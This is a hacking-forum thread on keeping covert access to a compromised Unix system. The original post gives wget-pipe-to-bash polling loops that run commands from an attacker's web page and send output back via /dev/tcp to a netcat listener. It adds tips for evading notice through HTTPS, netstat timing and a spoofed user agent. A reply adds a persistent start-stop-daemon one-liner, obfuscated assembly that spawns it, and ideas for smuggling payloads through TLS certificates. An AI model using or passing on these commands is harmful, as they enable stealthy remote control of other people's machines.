Using Wget for Maintaining Access to a System

[misfit]

This is a little trick I picked up recently. Can't remember where I got it, but I'm going to show you how it works. Below is the bash command using wget. For those who don't know, wget is a file download utility preinstalled on most Unix-like systems.

Code:

wget -q -O - http://example.com | bash

So basically what's going on is wget downloads the file with no output (-q flag) and instead of writing to a file like normal it pipes the output of the command to bash. The command on the web page is then executed. http://example.com would be a HTTP server you control. You could host a simple text file on with bash commands. For example, to make a "command page" for the shell all you have to do is (on Unix systems) enter: "touch command.txt". Then put whatever command you want in the file. To list directory contents on the compromised system execute this command on your system: "echo "ls" > command.txt"
 So that's all well and great. But it only allows one command to be executed at a time. Let's make a little bash script.

Code:

for i in {1..9999}
do

wget -q -O - http://example.com | bash
sleep 60
done

Save as a bash script (something.sh) and then execute it on target. It basically just executes whatever is on the control web page every 60 seconds. We can shorten this to a one liner if you would rather not write the script to the target disk.

Code:

for i in {1..9999}; do wget -q -O - http://example.com | bash; sleep 60; done

You can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need to have a netcat listener running to get the output:

Code:

wget -q -O - http://127.0.0.1:8080/cmd | bash &> /dev/tcp/127.0.0.1/31337

This is better than your average TCP reverse shell. The reasons being, 1: HTTP(S) is less suspicious on a network than straight up TCP. And yes, if your site runs HTTPS then the shell communications will also be encrypted. Reason 2: The connection only remains open as long as wget tries to connect back, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like a HTTP(S) connection. Under closer scrutiny on the network side, this shell will have a wget user agent. Just add your own with the wget -U flag.

That's all for today boys and girls. Hope you enjoyed and thanks for reading.

- ghost_eyes
https://github.com/ghostwalkr

[hotmagnet]

Really great tip, only how about using while true instead of for (count).

[DeepLogic]

Really great tip, only how about using while true instead of for (count).

I posted this on my old account, and thanks. Thanks for the recommendation, but this is by design. You could of course change it to a while loop if you wanted. But this just prevents the loop running infinitely, which I personally don't really want. Thanks for the comment

[Vector]

Saw the new reply to this thread and figured i'd check what's what. This is actually great for a malware concept i have been working on.

[Vector]

To expand a little on what i meant with 'malware concept'. I've been toying with some unconventional ways of thinking about creating utilities/scripts/software that has malware-like functionality. For use in active engagements.

Building on the original one liner posted here, i wrote another one-liner in an attempt to make something similar but more persistent.

Code:

start-stop-daemon -P fifo:5 -c 1:1 -k 0555 --exec $(which watch) 'bash -c while i=0; do   sleep 10;  wget -q -O - http://example.com/commands.sh | sh; done' --start

The reason for checking every 10 seconds is so that you can have an encoded shellscript at the ready for new operations, should the operator have a number of preconfigured ones ready. Automated updates with a series of instructions or shell scripts from the operators end, gives the person running the set up a lot of leeway to act and react.

It'd be interesting to drop a few static binaries on the box that's running the one liner in question. Certainly a version of busybox with OpenSSL, so the payloads can be easily encoded on one end and decoded on the other.

Essentially you could host shell scripts that write out an encoded payload, decode it on the fly and run it. Depending on the security context in which you're working of course.

You could do much the same and more without Bash and shellscripts as well of course. For instance

Code:

global _start
section .text

_start:
push 59
pop rax
cdq
push rdx
mov rbx, 0x6e6f6d6561642d70
push rbx
mov rbx, 0x6f74732d74726174
push rbx
mov rbx, 0x732f6e6962732f2f
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0xffffffffffffafd2
not rbx
push rbx
push rsp
pop r8
push rdx
mov rbx, 0xffffcac590999699
not rbx
push rbx
push rsp
pop r9
push rdx
mov rbx, 0xffffffffffff9cd2
not rbx
push rbx
push rsp
pop r10
push rdx
mov rbx, 0xffffffffffcec5ce
not rbx
push rbx
push rsp
pop r11
push rdx
mov rbx, 0xffffffffffff94d2
not rbx
push rbx
push rsp
pop r12
push rdx
mov rbx, 0xffffffffcacacacf
not rbx
push rbx
push rsp
pop r13
push rdx
mov rbx, 0xffff9c9a879ad2d2
not rbx
push rbx
push rsp
pop r14
push rdx
mov rbx, 0xffffff979c8b9e88
not rbx
push rbx
push rsp
pop r15
push rdx
push rsp
pop rdx
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsp
pop rsi
syscall

Compiling the above like so:

Code:

nasm -felf64 example.nasm -o example.o && ld example.o -o example

Would produce an executable file that essentially performs the same functions as invoking the start-stop-daemon and setting it to execute the `watch` utility. It will even take an argument as to which binary you'd like to execute when `watch` is invoked.

As far as the C2 server is concerned you could even go as far as to serve the shellscripts/instructions encoded through your CA/TLS certificate. Not sure if you're familiar with Unicorn, it's a python implementation that converts binaries to cert files among other things. And if you have OpenSSL available n the target box anyway, it would be very easy to turn the cert files back into, whichever format you'd like your instructions/commands to be in.

Anyway, i just thought that was pretty neat, so i figured i'd share.